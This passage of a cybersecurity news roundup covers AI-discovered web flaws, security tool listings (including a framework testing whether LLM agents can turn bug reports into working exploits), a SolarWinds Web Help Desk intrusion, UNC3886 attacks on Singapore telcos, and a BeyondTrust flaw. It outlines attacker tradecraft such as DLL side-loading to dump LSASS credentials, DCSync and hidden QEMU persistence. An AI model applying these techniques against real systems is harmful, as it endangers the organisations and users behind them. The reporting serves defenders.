• XBOW Uncovers 2 IDOR Flaws in Spree — AI-powered offensive security platform discovered two previously unknown Insecure Direct Object Reference (IDOR) vulnerabilities (CVE-2026-22588 and CVE-2026-22589) in Spree, an open-source e-commerce platform, that allows an attacker to access guest address information without supplying valid credentials or session cookies and retrieve other users’ address information by editing an existing, legitimate order. The issues were fixed in Spree version 5.2.5.

🎥 Cybersecurity Webinars

• Cloud Forensics Is Broken — Learn From Experts What Actually Works: Cloud attacks move fast and often leave little usable evidence behind. This webinar explains how modern cloud forensics works—using host-level data and AI to reconstruct attacks faster, understand what really happened, and improve incident response across SOC teams.
• Post-Quantum Cryptography: How Leaders Secure Data Before Quantum Breaks It: Quantum computing is advancing fast, and it could eventually break today’s encryption. Attackers are already collecting encrypted data now to decrypt later when quantum power becomes available. This webinar explains what that risk means, how post-quantum cryptography works, and what security leaders can do today—using practical strategies and real deployment models—to protect sensitive data before quantum threats become reality.

🔧 Cybersecurity Tools

• YARA Rule Skill (Community Edition): It is a tool that helps an AI agent write, review, and improve YARA detection rules. It analyzes rules for logic errors, weak strings, and performance problems using established best practices. Security teams use it to strengthen malware detection, improve rule accuracy, and ensure rules run efficiently with fewer false positives.
• Anamnesis: It is a research framework that tests how LLM agents turn a vulnerability report and a small trigger PoC into working exploits under real defenses (ASLR, NX, RELRO, CFI, shadow stack, sandboxing). It runs controlled experiments to see what bypasses work, how consistent the results are across runs, and what that implies for practical risk.

Disclaimer: These tools are provided for research and educational use only. They are not security-audited and may cause harm if misused. Review the code, test in controlled environments, and comply with all applicable laws and policies.

Conclusion

The takeaway this week is simple: exposure is growing faster than visibility. Many risks aren’t coming from unknown threats, but from known systems being used in unexpected ways. Security teams are being forced to watch not just networks and endpoints, but ecosystems, integrations, and automated workflows.

What matters now is readiness across layers — software, supply chains, AI tooling, infrastructure, and user platforms. Attackers are operating across all of them at once, blending old techniques with new access paths.

Staying secure is no longer about fixing one flaw at a time. It’s about understanding how every connected system can influence the next — and closing those gaps before they’re chained together.

Ravie LakshmananFeb 09, 2026Vulnerability / Endpoint Security

Microsoft has revealed that it observed a multi‑stage intrusion that involved the threat actors exploiting internet‑exposed SolarWinds Web Help Desk (WHD) instances to obtain initial access and move laterally across the organization’s network to other high-value assets.

That said, the Microsoft Defender Security Research Team said it’s not clear whether the activity weaponized recently disclosed flaws (CVE-2025-40551, CVSS score: 9.8, and CVE-2025-40536, CVSS score: 8.1), or a previously patched vulnerability (CVE-2025-26399, CVSS score: 9.8).

“Since the attacks occurred in December 2025 and on machines vulnerable to both the old and new set of CVEs at the same time, we cannot reliably confirm the exact CVE used to gain an initial foothold,” the company said in a report published last week.

While CVE-2025-40536 is a security control bypass vulnerability that could allow an unauthenticated attacker to gain access to certain restricted functionality, CVE-2025-40551 and CVE-2025-26399 both refer to untrusted data deserialization vulnerabilities that could lead to remote code execution.

Last week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-40551 to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. Federal Civilian Executive Branch (FCEB) agencies were ordered to apply the fixes for the flaw by February 6, 2026.

In the attacks detected by Microsoft, successful exploitation of the exposed SolarWinds WHD instance allowed the attackers to achieve unauthenticated remote code execution and run arbitrary commands within the WHD application context.

“Upon successful exploitation, the compromised service of a WHD instance spawned PowerShell to leverage BITS [Background Intelligent Transfer Service] for payload download and execution,” researchers Sagar Patil, Hardik Suri, Eric Hopper, and Kajhon Soyini noted.

In the next stage, the threat actors downloaded legitimate components associated with Zoho ManageEngine, a legitimate remote monitoring and management (RMM) solution, to enable persistent remote control over the infected system. The attackers followed it up with a series of actions –

• Enumerated sensitive domain users and groups, including Domain Admins.
• Established persistence via reverse SSH and RDP access, with the attackers also attempting to create a scheduled task to launch a QEMU virtual machine under the SYSTEM account at system startup to cover up the tracks within a virtualized environment while exposing SSH access via port forwarding.
• Used DLL side-loading on some hosts by using “wab.exe,” a legitimate system executable associated with the Windows Address Book, to launch a rogue DLL (“sspicli.dll”) to dump the contents of LSASS memory and conduct credential theft.

In at least one case, Microsoft said the threat actors conducted a DCSync attack, where a Domain Controller (DC) is simulated to request password hashes and other sensitive information from an Active Directory (AD) database.

To counter the threat, users are advised to keep the WHD instances up-to-date, find and remove any unauthorized RMM tools, rotate service and admin accounts, and isolate compromised machines to limit the breach.

“This activity reflects a common but high-impact pattern: a single exposed application can provide a path to full domain compromise when vulnerabilities are unpatched or insufficiently monitored,” the Windows maker said.

“In this intrusion, attackers relied heavily on living-off-the-land techniques, legitimate administrative tools, and low-noise persistence mechanisms. These tradecraft choices reinforce the importance of defense in depth, timely patching of internet-facing services, and behavior-based detection across identity, endpoint, and network layers.”

Ravie LakshmananFeb 09, 2026Cyber Espionage / Virtualization

The Cyber Security Agency (CSA) of Singapore on Monday revealed that the China-nexus cyber espionage group known as UNC3886 targeted its telecommunications sector.

“UNC3886 had launched a deliberate, targeted, and well-planned campaign against Singapore’s telecommunications sector,” CSA said. “All four of Singapore’s major telecommunications operators (‘telcos’) – M1, SIMBA Telecom, Singtel, and StarHub – have been the target of attacks.”

The development comes more than six months after Singapore’s Coordinating Minister for National Security, K. Shanmugam, accused UNC3886 of striking high-value strategic threat targets. UNC3886 is assessed to be active since at least 2022, targeting edge devices and virtualization technologies to obtain initial access.

In July 2025, Sygnia disclosed details of a long-term cyber espionage campaign attributed to a threat cluster it tracks as Fire Ant and which shares tooling and targeting overlaps with UNC3886, stating the adversary infiltrates organizations’ VMware ESXi and vCenter environments as well as network appliances.

Describing UNC3886 as an advanced persistent threat (APT) with “deep capabilities,” the CSA said the threat actors deployed sophisticated tools to gain access into telco systems, in one instance even weaponizing a zero-day exploit to bypass a perimeter firewall and siphon a small amount of technical data to further its operational objectives. The exact specifics of the flaw were not disclosed.

In a second case, UNC3886 is said to have deployed rootkits to establish persistent access and conceal their tracks to fly under the radar. Other activities undertaken by the threat actor include gaining unauthorized access to “some parts” of telco networks and systems, including those deemed critical, although it’s assessed that the incident was not severe enough to disrupt services.

CSA said it mounted a cyber operation dubbed CYBER GUARDIAN to counter the threat and limit the attackers’ movement into telecom networks. It also emphasized that there is no evidence that the threat actor exfiltrated personal data such as customer records or cut off internet availability.

“Cyber defenders have since implemented remediation measures, closed off UNC3886’s access points, and expanded monitoring capabilities in the targeted telcos,” the agency said.

Ravie LakshmananFeb 09, 2026Enterprise Security / Network Security

BeyondTrust has released updates to address a critical security flaw impacting Remote Support (RS) and Privileged Remote Access (PRA) products that, if successfully exploited, could result in remote code execution.

“BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA) contain a critical pre-authentication remote code execution vulnerability,” the company said in an advisory released February 6, 2026.

“By sending specially crafted requests, an unauthenticated remote attacker may be able to execute operating system commands in the context of the site user.”

The vulnerability, categorized as an operating system command injection, has been assigned the CVE identifier CVE-2026-1731. It’s rated 9.9 on the CVSS scoring system.

BeyondTrust said successful exploitation of the shortcoming could allow an unauthenticated remote attacker to execute operating system commands in the context of the site user, resulting in unauthorized access, data exfiltration, and service disruption.

The issue affects the following versions –

• Remote Support versions 25.3.1 and prior
• Privileged Remote Access versions 24.3.4 and prior

It has been patched in the following versions –

• Remote Support – Patch BT26-02-RS, 25.3.2 and later
• Privileged Remote Access – Patch BT26-02-PRA, 25.1.1 and later

The company is also urging self-hosted customers of Remote Support and Privileged Remote Access to manually apply the patch if their instance is not subscribed to automatic updates. Those running a Remote Support version older than 21.3 or on Privileged Remote Access older than 22.1 are also required to upgrade to a newer version to apply this patch.

“Self-hosted customers of PRA may also upgrade to 25.1.1 or a newer version to remediate this vulnerability,” it added.

According to security researcher and Hacktron AI co-founder Harsh Jaiswal, the vulnerability was discovered on January 31, 2026, through an artificial intelligence (AI)-enabled variant analysis, adding that it found about 11,000 instances exposed to the internet. Additional details of the flaw have been withheld to give users time to apply the patches.

“About ~8,500 of those are on-prem deployments, which remain potentially vulnerable if patches aren’t applied,” Jaiswal and Mohan Sri Rama Krishna Pedhapati said.

With security flaws in BeyondTrust Privileged Remote Access and Remote Support having come under active exploitation in the past, it’s essential that users update to the latest version as soon as possible for optimal protection.